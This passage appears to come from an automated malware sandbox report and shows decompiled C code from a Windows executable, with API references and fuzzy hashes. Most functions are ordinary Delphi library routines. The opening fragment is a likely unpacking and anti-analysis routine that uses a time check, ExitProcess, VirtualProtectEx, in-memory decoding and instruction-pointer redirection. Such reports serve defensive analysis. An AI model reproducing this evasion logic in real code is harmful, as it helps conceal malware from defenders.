				if(E004703B0( *((intOrPtr*)( *_t31))) == 0) {
					if(E004703E4( *((intOrPtr*)( *_t31))) == 0) {
						return 0;
					}
					 *((intOrPtr*)( *(_t31 + 4) + 0xb8)) = 0x4703a0;
					return 0xffffffffffffffff;
				}
				_t22 =  *(_t31 + 4);
				if(( *(_t22 + 0xa4) ^ 0x00073edc) != 0x4cb23) {
					return 0;
				}
				VirtualProtectEx(0xffffffff,  *(_t22 + 0xb0), 0x15835, 4,  &_v8); // executed
				E004704E0(_t31,  *((intOrPtr*)( *(_t31 + 4) + 0xb0)), 0x15835, __edi, __esi, 0x1c6f0, 0x471d68);
				_t29 =  *(_t31 + 4);
				 *((intOrPtr*)(_t29 + 0xb8)) =  *((intOrPtr*)(_t29 + 0xb8)) + 0x2dd7;
				return _t29 | 0xffffffff;
			}

0x004703fd
0x0047040b
0x0047047d
0x00000000
0x00470492
0x00470487
0x00000000
0x0047048d
0x0047040d
0x00470422
0x00000000
0x0047046e
0x00470438
0x00470457
0x0047045c
0x0047045f
0x00000000

APIs

Part of subcall function 004703B0: GetSystemTime.KERNEL32 ref: 004703B7
Part of subcall function 004703B0: ExitProcess.KERNEL32(00000000), ref: 004703C6
Part of subcall function 004703B0: 6E1625A0.OPENGL32(00000000), ref: 004703D8

VirtualProtectEx.KERNEL32(000000FF,?,00015835,00000004,?), ref: 00470438

Memory Dump Source

Source File: 00000000.00000002.234059191.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234054357.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.234107798.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234112555.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234119396.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234123968.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234129076.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: E1625ExitProcessProtectSystemTimeVirtual
String ID:
API String ID: 457145881-0
Opcode ID: ee49645b592d19a6818cabc570a6b2e80f98111c8c2ee7b9a03dc5db58d731a8
Instruction ID: 2c80a5514cda9617734d89195dc93e2807661e808fd56c8279d293839e776d7e
Opcode Fuzzy Hash: ee49645b592d19a6818cabc570a6b2e80f98111c8c2ee7b9a03dc5db58d731a8
Instruction Fuzzy Hash: 12113C34215200DFD750DB24C981EA673A5AF85324F14C2B6AA189F396DA78EC41CB6A

Uniqueness

Uniqueness Score: -1.00%

Function 0040728A, Relevance: 1.5, APIs: 1, Instructions: 28
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040728A(CHAR* __eax, long __ecx, CHAR* __edx, void* _a4, struct HINSTANCE__* _a8, struct HMENU__* _a12, struct HWND__* _a16, int _a20, int _a24, int _a28, int _a32) {
				struct HWND__* _t10;

				_t10 = CreateWindowExA(0, __eax, __edx, __ecx, _a32, _a28, _a24, _a20, _a16, _a12, _a8, _a4); // executed
				return _t10;
			}

0x004072b5
0x004072bc

APIs

CreateWindowExA.USER32 ref: 004072B5

Memory Dump Source

Source File: 00000000.00000002.234059191.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234054357.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.234107798.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234112555.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234119396.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234123968.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234129076.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 89ec8fafd779a4f510c7dc37850e4db6278f995c39f73d931340cda5e2e40546
Instruction ID: 108bb5fc50b6e5823d5570ef7878ae84b760d967d62aca15d66f8c04c0ffcf35
Opcode Fuzzy Hash: 89ec8fafd779a4f510c7dc37850e4db6278f995c39f73d931340cda5e2e40546
Instruction Fuzzy Hash: 7BE0FEB2244209BFEB00DE8ADDC1DABB7ACFB4C654F814115BB1C97242D675AC608B75

Uniqueness

Uniqueness Score: -1.00%

Function 0040728C, Relevance: 1.5, APIs: 1, Instructions: 27
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040728C(CHAR* __eax, long __ecx, CHAR* __edx, void* _a4, struct HINSTANCE__* _a8, struct HMENU__* _a12, struct HWND__* _a16, int _a20, int _a24, int _a28, int _a32) {
				struct HWND__* _t10;

				_t10 = CreateWindowExA(0, __eax, __edx, __ecx, _a32, _a28, _a24, _a20, _a16, _a12, _a8, _a4); // executed
				return _t10;
			}

0x004072b5
0x004072bc

APIs

CreateWindowExA.USER32 ref: 004072B5

Memory Dump Source

Source File: 00000000.00000002.234059191.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234054357.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.234107798.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234112555.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234119396.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234123968.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234129076.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 4adc99ed55311126ab1ca61859c8c3750e42c7b312ff2ba14b9157c054dade66
Instruction ID: d219aed579f78b2e9c95331c08286bed8e598a722e81b5c9ca34401c87b76ed6
Opcode Fuzzy Hash: 4adc99ed55311126ab1ca61859c8c3750e42c7b312ff2ba14b9157c054dade66
Instruction Fuzzy Hash: 58E0FEB2244209BBEB00DE8ADDC1DABB7ACFB4C654F814115BB1C972428675AC608B75

Uniqueness

Uniqueness Score: -1.00%

Function 00405A3C, Relevance: 1.5, APIs: 1, Instructions: 26
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405A3C(void* __eax) {
				char _v272;
				intOrPtr _t14;
				void* _t16;
				intOrPtr _t18;
				intOrPtr _t19;

				_t16 = __eax;
				if( *((intOrPtr*)(__eax + 0x10)) == 0) {
					_t3 = _t16 + 4; // 0x400000
					GetModuleFileNameA( *_t3,  &_v272, 0x105);
					_t14 = E00405C78(_t19); // executed
					_t18 = _t14;
					 *((intOrPtr*)(_t16 + 0x10)) = _t18;
					if(_t18 == 0) {
						_t5 = _t16 + 4; // 0x400000
						 *((intOrPtr*)(_t16 + 0x10)) =  *_t5;
					}
				}
				_t7 = _t16 + 0x10; // 0x400000
				return  *_t7;
			}

0x00405a44
0x00405a4a
0x00405a56
0x00405a5a
0x00405a63
0x00405a68
0x00405a6a
0x00405a6f
0x00405a71
0x00405a74
0x00405a74
0x00405a6f
0x00405a77
0x00405a82

APIs

GetModuleFileNameA.KERNEL32(00400000,?,00000105,00000001,00410470,00405AA4,00406550,0000FF99,?,00000400,?,00410470,0041407F,00000000,004140A4), ref: 00405A5A

Part of subcall function 00405C78: GetModuleFileNameA.KERNEL32(00000000,?,00000105,00000001,0047108C,?,00405A68,00400000,?,00000105,00000001,00410470,00405AA4,00406550,0000FF99,?), ref: 00405C94
Part of subcall function 00405C78: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,00000001,0047108C,?,00405A68,00400000,?,00000105,00000001), ref: 00405CB2
Part of subcall function 00405C78: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,00000001,0047108C), ref: 00405CD0
Part of subcall function 00405C78: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 00405CEE
Part of subcall function 00405C78: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000005,00000000,00405D7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 00405D37
Part of subcall function 00405C78: RegQueryValueExA.ADVAPI32(?,00405EE4,00000000,00000000,00000000,00000005,?,?,00000000,00000000,00000000,00000005,00000000,00405D7D,?,80000001), ref: 00405D55
Part of subcall function 00405C78: RegCloseKey.ADVAPI32(?,00405D84,00000000,00000000,00000005,00000000,00405D7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 00405D77

Memory Dump Source

Source File: 00000000.00000002.234059191.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234054357.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.234107798.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234112555.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234119396.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234123968.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234129076.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: Open$FileModuleNameQueryValue$Close
String ID:
API String ID: 2796650324-0
Opcode ID: 3d2362743f924f875b5a350bdc77fee5870a8126f4c59cb65ab49357851bb911
Instruction ID: eb3007f67f035d8ae6987e39c34b1bfc81debd44418eda91f1e8b5ec37918a95
Opcode Fuzzy Hash: 3d2362743f924f875b5a350bdc77fee5870a8126f4c59cb65ab49357851bb911
Instruction Fuzzy Hash: 7AE03971A006188BCB10DE6888C1A973398AB08754F4006A6AD54EF386D374D9108F94

Uniqueness

Uniqueness Score: -1.00%

Function 00401724, Relevance: 1.3, APIs: 1, Instructions: 54
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401724(signed int __eax, void** __ecx, intOrPtr __edx) {
				signed int _v20;
				void** _v24;
				void* _t15;
				void** _t16;
				void* _t17;
				signed int _t27;
				intOrPtr* _t29;
				void* _t31;
				intOrPtr* _t32;

				_v24 = __ecx;
				 *_t32 = __edx;
				_t31 = __eax & 0xfffff000;
				_v20 = __eax +  *_t32 + 0x00000fff & 0xfffff000;
				 *_v24 = _t31;
				_t15 = _v20 - _t31;
				_v24[1] = _t15;
				_t29 =  *0x48f5e4; // 0x520dcc
				while(_t29 != 0x48f5e4) {
					_t17 =  *(_t29 + 8);
					_t27 =  *((intOrPtr*)(_t29 + 0xc)) + _t17;
					if(_t31 > _t17) {
						_t17 = _t31;
					}
					if(_t27 > _v20) {
						_t27 = _v20;
					}
					if(_t27 > _t17) {
						_t15 = VirtualAlloc(_t17, _t27 - _t17, 0x1000, 4); // executed
						if(_t15 == 0) {
							_t16 = _v24;
							 *_t16 = 0;
							return _t16;
						}
					}
					_t29 =  *_t29;
				}
				return _t15;
			}

0x0040172b
0x0040172f
0x00401736
0x0040174b
0x00401753
0x00401759
0x0040175f
0x00401762
0x004017a6
0x0040176a
0x00401770
0x00401774
0x00401776
0x00401776
0x0040177c
0x0040177e
0x0040177e
0x00401784
0x00401791
0x00401798
0x0040179a
0x004017a0
0x00000000
0x004017a0
0x00401798
0x004017a4
0x004017a4
0x004017b5

APIs

VirtualAlloc.KERNEL32(?,?,00001000,00000004), ref: 00401791

Memory Dump Source

Source File: 00000000.00000002.234059191.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234054357.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.234107798.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234112555.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234119396.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234123968.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234129076.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: afbc9eaa895e3e39448bee3130202f419427eff59d90178ec687e4b5fd235349
Instruction ID: 43c0cd8182e11655965b4a28ce9b3d8169f37dad9e43c7878f848ef0a0e78916
Opcode Fuzzy Hash: afbc9eaa895e3e39448bee3130202f419427eff59d90178ec687e4b5fd235349
Instruction Fuzzy Hash: BC117C7AA046019FC3109F29C980A1BB7E5EFC4760F15C63EE598A73A5D639AC408B89

Uniqueness

Uniqueness Score: -1.00%

Function 0041CDB0, Relevance: 1.3, APIs: 1, Instructions: 52
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041CDB0(intOrPtr _a4, intOrPtr _a8) {
				void* _t14;
				void _t15;
				intOrPtr _t25;
				char* _t26;
				void* _t35;

				if( *0x48fa20 == 0) {
					_t14 = VirtualAlloc(0, 0x1000, 0x1000, 0x40); // executed
					_t35 = _t14;
					_t15 =  *0x48fa1c; // 0x2110000
					 *_t35 = _t15;
					_t1 = _t35 + 4; // 0x4
					E00402994(0x4714bc, 2, _t1);
					_t2 = _t35 + 5; // 0x5
					 *((intOrPtr*)(_t35 + 6)) = E0041CDA8(_t2, E0041CD88);
					_t4 = _t35 + 0xa; // 0xa
					_t26 = _t4;
					do {
						 *_t26 = 0xe8;
						_t5 = _t35 + 4; // 0x4
						 *((intOrPtr*)(_t26 + 1)) = E0041CDA8(_t26, _t5);
						 *((intOrPtr*)(_t26 + 5)) =  *0x48fa20;
						 *0x48fa20 = _t26;
						_t26 = _t26 + 0xd;
					} while (_t26 - _t35 < 0xffc);
					 *0x48fa1c = _t35;
				}
				_t25 =  *0x48fa20;
				 *0x48fa20 =  *((intOrPtr*)(_t25 + 5));
				 *((intOrPtr*)(_t25 + 5)) = _a4;
				 *((intOrPtr*)(_t25 + 9)) = _a8;
				return  *0x48fa20;
			}

0x0041cdbe
0x0041cdce
0x0041cdd3
0x0041cdd5
0x0041cdda
0x0041cddc
0x0041cde9
0x0041cdf3
0x0041cdfb
0x0041cdfe
0x0041cdfe
0x0041ce01
0x0041ce01
0x0041ce04
0x0041ce0e
0x0041ce13
0x0041ce16
0x0041ce18
0x0041ce1f
0x0041ce26
0x0041ce26
0x0041ce2e
0x0041ce33
0x0041ce38
0x0041ce3e
0x0041ce45

APIs

VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040), ref: 0041CDCE

Memory Dump Source

Source File: 00000000.00000002.234059191.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234054357.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.234107798.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234112555.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234119396.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234123968.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234129076.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 137d51fb405133eaef39d3aa0dad868edf6e18bb3f5f7bf3006fc37a246a785e
Instruction ID: 202082514fdac41c38a9e5e9c68aab4eaf1bc166bcd1626add94992ae5d6a61e
Opcode Fuzzy Hash: 137d51fb405133eaef39d3aa0dad868edf6e18bb3f5f7bf3006fc37a246a785e
Instruction Fuzzy Hash: C91148742403058BD720DF19DCC1B86FBE5EF88360F10C53AE9999B785D378E9558BA8

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00443C20, Relevance: 49.1, APIs: 15, Strings: 13, Instructions: 95
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E00443C20() {
				int _v8;
				intOrPtr _t4;
				struct HINSTANCE__* _t11;
				struct HINSTANCE__* _t13;
				struct HINSTANCE__* _t15;
				struct HINSTANCE__* _t17;
				struct HINSTANCE__* _t19;
				struct HINSTANCE__* _t21;
				struct HINSTANCE__* _t23;
				struct HINSTANCE__* _t25;
				struct HINSTANCE__* _t27;
				struct HINSTANCE__* _t29;
				intOrPtr _t40;
				intOrPtr _t42;
				intOrPtr _t44;

				_t42 = _t44;
				_t4 =  *0x48e85c; // 0x48f7f0
				if( *((char*)(_t4 + 0xc)) == 0) {
					return _t4;
				} else {
					_v8 = SetErrorMode(0x8000);
					_push(_t42);
					_push(0x443d86);
					_push( *[fs:eax]);
					 *[fs:eax] = _t44;
					if( *0x48fbb8 == 0) {
						 *0x48fbb8 = GetProcAddress(GetModuleHandleA("USER32"), "WINNLSEnableIME");
					}
					if( *0x4719fc == 0) {
						 *0x4719fc = LoadLibraryA("IMM32.DLL");
						if( *0x4719fc != 0) {
							_t11 =  *0x4719fc; // 0x0
							 *0x48fbbc = GetProcAddress(_t11, "ImmGetContext");
							_t13 =  *0x4719fc; // 0x0
							 *0x48fbc0 = GetProcAddress(_t13, "ImmReleaseContext");
							_t15 =  *0x4719fc; // 0x0
							 *0x48fbc4 = GetProcAddress(_t15, "ImmGetConversionStatus");
							_t17 =  *0x4719fc; // 0x0
							 *0x48fbc8 = GetProcAddress(_t17, "ImmSetConversionStatus");
							_t19 =  *0x4719fc; // 0x0
							 *0x48fbcc = GetProcAddress(_t19, "ImmSetOpenStatus");
							_t21 =  *0x4719fc; // 0x0
							 *0x48fbd0 = GetProcAddress(_t21, "ImmSetCompositionWindow");
							_t23 =  *0x4719fc; // 0x0
							 *0x48fbd4 = GetProcAddress(_t23, "ImmSetCompositionFontA");
							_t25 =  *0x4719fc; // 0x0
							 *0x48fbd8 = GetProcAddress(_t25, "ImmGetCompositionStringA");
							_t27 =  *0x4719fc; // 0x0
							 *0x48fbdc = GetProcAddress(_t27, "ImmIsIME");
							_t29 =  *0x4719fc; // 0x0
							 *0x48fbe0 = GetProcAddress(_t29, "ImmNotifyIME");
						}
					}
					_pop(_t40);
					 *[fs:eax] = _t40;
					_push(0x443d8d);
					return SetErrorMode(_v8);
				}
			}

0x00443c21
0x00443c25
0x00443c2e
0x00443d90
0x00443c34
0x00443c3e
0x00443c43
0x00443c44
0x00443c49
0x00443c4c
0x00443c56
0x00443c6f
0x00443c6f
0x00443c7b
0x00443c8b
0x00443c97
0x00443ca2
0x00443cad
0x00443cb7
0x00443cc2
0x00443ccc
0x00443cd7
0x00443ce1
0x00443cec
0x00443cf6
0x00443d01
0x00443d0b
0x00443d16
0x00443d20
0x00443d2b
0x00443d35
0x00443d40
0x00443d4a
0x00443d55
0x00443d5f
0x00443d6a
0x00443d6a
0x00443c97
0x00443d71
0x00443d74
0x00443d77
0x00443d85
0x00443d85

APIs

SetErrorMode.KERNEL32(00008000), ref: 00443C39
GetModuleHandleA.KERNEL32(USER32,00000000,00443D86,?,00008000), ref: 00443C5D
GetProcAddress.KERNEL32(00000000,WINNLSEnableIME), ref: 00443C6A
LoadLibraryA.KERNEL32(IMM32.DLL,00000000,00443D86,?,00008000), ref: 00443C86
GetProcAddress.KERNEL32(00000000,ImmGetContext), ref: 00443CA8
GetProcAddress.KERNEL32(00000000,ImmReleaseContext), ref: 00443CBD
GetProcAddress.KERNEL32(00000000,ImmGetConversionStatus), ref: 00443CD2
GetProcAddress.KERNEL32(00000000,ImmSetConversionStatus), ref: 00443CE7
GetProcAddress.KERNEL32(00000000,ImmSetOpenStatus), ref: 00443CFC
GetProcAddress.KERNEL32(00000000,ImmSetCompositionWindow), ref: 00443D11
GetProcAddress.KERNEL32(00000000,ImmSetCompositionFontA), ref: 00443D26
GetProcAddress.KERNEL32(00000000,ImmGetCompositionStringA), ref: 00443D3B
GetProcAddress.KERNEL32(00000000,ImmIsIME), ref: 00443D50
GetProcAddress.KERNEL32(00000000,ImmNotifyIME), ref: 00443D65
SetErrorMode.KERNEL32(?,00443D8D,00008000), ref: 00443D80

Strings

ImmSetCompositionWindow, xrefs: 00443D06
USER32, xrefs: 00443C58
ImmGetConversionStatus, xrefs: 00443CC7
ImmGetContext, xrefs: 00443C9D
ImmSetOpenStatus, xrefs: 00443CF1
IMM32.DLL, xrefs: 00443C81
ImmGetCompositionStringA, xrefs: 00443D30
ImmSetConversionStatus, xrefs: 00443CDC
ImmNotifyIME, xrefs: 00443D5A
ImmIsIME, xrefs: 00443D45
ImmSetCompositionFontA, xrefs: 00443D1B
WINNLSEnableIME, xrefs: 00443C64
ImmReleaseContext, xrefs: 00443CB2

Memory Dump Source

Source File: 00000000.00000002.234059191.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234054357.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.234107798.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234112555.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234119396.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234123968.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234129076.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$ErrorMode$HandleLibraryLoadModule
String ID: IMM32.DLL$ImmGetCompositionStringA$ImmGetContext$ImmGetConversionStatus$ImmIsIME$ImmNotifyIME$ImmReleaseContext$ImmSetCompositionFontA$ImmSetCompositionWindow$ImmSetConversionStatus$ImmSetOpenStatus$USER32$WINNLSEnableIME
API String ID: 3397921170-3271328588
Opcode ID: 4255e3025869c1075a1193b16d49dff0012d51cad6fab601df094ab62f6d82f0
Instruction ID: fb902e251235f175dbb9af0a75202c75039d8a9418a05cdd53d80fd9f9963354
Opcode Fuzzy Hash: 4255e3025869c1075a1193b16d49dff0012d51cad6fab601df094ab62f6d82f0
Instruction Fuzzy Hash: 233154F5E12340AEE300EF69DC66E1A37A8E704B05B21893FB505972A2D67C9950CB1C

Uniqueness

Uniqueness Score: -1.00%

Function 00405AC0, Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 136
stringlibraryfileCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E00405AC0(char* __eax, intOrPtr __edx) {
				char* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				struct _WIN32_FIND_DATAA _v334;
				char _v595;
				void* _t45;
				char* _t54;
				char* _t64;
				void* _t83;
				intOrPtr* _t84;
				char* _t90;
				struct HINSTANCE__* _t91;
				char* _t93;
				void* _t94;
				char* _t95;
				void* _t96;

				_v12 = __edx;
				_v8 = __eax;
				_v16 = _v8;
				_t91 = GetModuleHandleA("kernel32.dll");
				if(_t91 == 0) {
					L4:
					if( *_v8 != 0x5c) {
						_t93 = _v8 + 2;
						goto L10;
					} else {
						if( *((char*)(_v8 + 1)) == 0x5c) {
							_t95 = E00405AAC(_v8 + 2);
							if( *_t95 != 0) {
								_t14 = _t95 + 1; // 0x1
								_t93 = E00405AAC(_t14);
								if( *_t93 != 0) {
									L10:
									_t83 = _t93 - _v8;
									_push(_t83 + 1);
									_push(_v8);
									_push( &_v595);
									L00401310();
									while( *_t93 != 0) {
										_t90 = E00405AAC(_t93 + 1);
										_t45 = _t90 - _t93;
										if(_t45 + _t83 + 1 <= 0x105) {
											_push(_t45 + 1);
											_push(_t93);
											_push( &(( &_v595)[_t83]));
											L00401310();
											_t94 = FindFirstFileA( &_v595,  &_v334);
											if(_t94 != 0xffffffff) {
												FindClose(_t94);
												_t54 =  &(_v334.cFileName);
												_push(_t54);
												L00401318();
												if(_t54 + _t83 + 1 + 1 <= 0x105) {
													 *((char*)(_t96 + _t83 - 0x24f)) = 0x5c;
													_push(0x105 - _t83 - 1);
													_push( &(_v334.cFileName));
													_push( &(( &(( &_v595)[_t83]))[1]));
													L00401310();
													_t64 =  &(_v334.cFileName);
													_push(_t64);
													L00401318();
													_t83 = _t83 + _t64 + 1;
													_t93 = _t90;
													continue;
												}
											}
										}
										goto L17;
									}
									_push(_v12);
									_push( &_v595);
									_push(_v8);
									L00401310();
								}
							}
						}
					}
				} else {
					_t84 = GetProcAddress(_t91, "GetLongPathNameA");
					if(_t84 == 0) {
						goto L4;
					} else {
						_push(0x105);
						_push( &_v595);
						_push(_v8);
						if( *_t84() == 0) {
							goto L4;
						} else {
							_push(_v12);
							_push( &_v595);
							_push(_v8);
							L00401310();
						}
					}
				}
				L17:
				return _v16;
			}

0x00405acc
0x00405acf
0x00405ad5
0x00405ae2
0x00405ae6
0x00405b28
0x00405b2e
0x00405b6b
0x00000000
0x00405b30
0x00405b37
0x00405b48
0x00405b4d
0x00405b53
0x00405b5b
0x00405b60
0x00405b6e
0x00405b70
0x00405b76
0x00405b7a
0x00405b81
0x00405b82
0x00405c2d
0x00405b94
0x00405b98
0x00405ba5
0x00405bac
0x00405bad
0x00405bb6
0x00405bb7
0x00405bcf
0x00405bd4
0x00405bd7
0x00405bdc
0x00405be2
0x00405be3
0x00405bf3
0x00405bf5
0x00405c05
0x00405c0c
0x00405c16
0x00405c17
0x00405c1c
0x00405c22
0x00405c23
0x00405c29
0x00405c2b
0x00000000
0x00405c2b
0x00405bf3
0x00405bd4
0x00000000
0x00405ba5
0x00405c39
0x00405c40
0x00405c44
0x00405c45
0x00405c45
0x00405b60
0x00405b4d
0x00405b37
0x00405ae8
0x00405af3
0x00405af7
0x00000000
0x00405af9
0x00405af9
0x00405b04
0x00405b08
0x00405b0d
0x00000000
0x00405b0f
0x00405b12
0x00405b19
0x00405b1d
0x00405b1e
0x00405b1e
0x00405b0d
0x00405af7
0x00405c4a
0x00405c53

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,?,00000001,0047108C,?,00405D20,00000000,00405D7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 00405ADD
GetProcAddress.KERNEL32(00000000,GetLongPathNameA), ref: 00405AEE
lstrcpyn.KERNEL32(?,?,?,?,00000001,0047108C,?,00405D20,00000000,00405D7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?), ref: 00405B1E
lstrcpyn.KERNEL32(?,?,?,kernel32.dll,?,00000001,0047108C,?,00405D20,00000000,00405D7D,?,80000001,Software\Borland\Locales,00000000,000F0019), ref: 00405B82
lstrcpyn.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,?,00000001,0047108C,?,00405D20,00000000,00405D7D,?,80000001), ref: 00405BB7
FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,?,00000001,0047108C,?,00405D20,00000000,00405D7D), ref: 00405BCA
FindClose.KERNEL32(00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,?,00000001,0047108C,?,00405D20,00000000), ref: 00405BD7
lstrlen.KERNEL32(?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,?,00000001,0047108C,?,00405D20), ref: 00405BE3
lstrcpyn.KERNEL32(0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,?,00000001), ref: 00405C17
lstrlen.KERNEL32(?,0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll), ref: 00405C23
lstrcpyn.KERNEL32(?,0000005C,?,?,0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?), ref: 00405C45

Strings

\, xrefs: 00405BF5
GetLongPathNameA, xrefs: 00405AE8
kernel32.dll, xrefs: 00405AD8

Memory Dump Source

Source File: 00000000.00000002.234059191.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234054357.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.234107798.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234112555.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234119396.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234123968.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234129076.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
String ID: GetLongPathNameA$\$kernel32.dll
API String ID: 3245196872-1565342463
Opcode ID: 205054ec60151739824bfc0cfe4213723e452c19be612335f9d6d27625c40468
Instruction ID: 296a13db2414833b3bf80d2bdfa437c82c634a9cd7f8270e4b53d567bb21fe4a
Opcode Fuzzy Hash: 205054ec60151739824bfc0cfe4213723e452c19be612335f9d6d27625c40468
Instruction Fuzzy Hash: BD416072900619ABEB10DAA8CC85EDFB7EDDF44314F1405B7B949F7281D638AE408F68

Uniqueness

Uniqueness Score: -1.00%

Function 00454FF0, Relevance: 18.4, APIs: 12, Instructions: 407
windowCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E00454FF0(intOrPtr* __eax, void* __ebx, void* __edi, void* __esi) {
				intOrPtr* _v8;
				char _v12;
				intOrPtr _t149;
				intOrPtr _t154;
				intOrPtr _t155;
				intOrPtr _t160;
				intOrPtr _t162;
				intOrPtr _t163;
				void* _t165;
				struct HWND__* _t166;
				long _t176;
				signed int _t198;
				signed int _t199;
				long _t220;
				intOrPtr _t226;
				int _t231;
				intOrPtr _t232;
				intOrPtr _t241;
				intOrPtr _t245;
				signed int _t248;
				intOrPtr _t251;
				intOrPtr _t252;
				signed int _t258;
				long _t259;
				intOrPtr _t262;
				intOrPtr _t266;
				signed int _t269;
				intOrPtr _t270;
				intOrPtr _t271;
				signed int _t277;
				long _t278;
				intOrPtr _t281;
				signed int _t286;
				signed int _t287;
				long _t290;
				intOrPtr _t294;
				struct HWND__* _t299;
				signed int _t301;
				signed int _t302;
				signed int _t305;
				signed int _t307;
				long _t308;
				signed int _t311;
				signed int _t313;
				long _t314;
				signed int _t317;
				signed int _t318;
				signed int _t326;
				long _t328;
				intOrPtr _t331;
				intOrPtr _t362;
				long _t370;
				void* _t372;
				void* _t373;
				intOrPtr _t374;

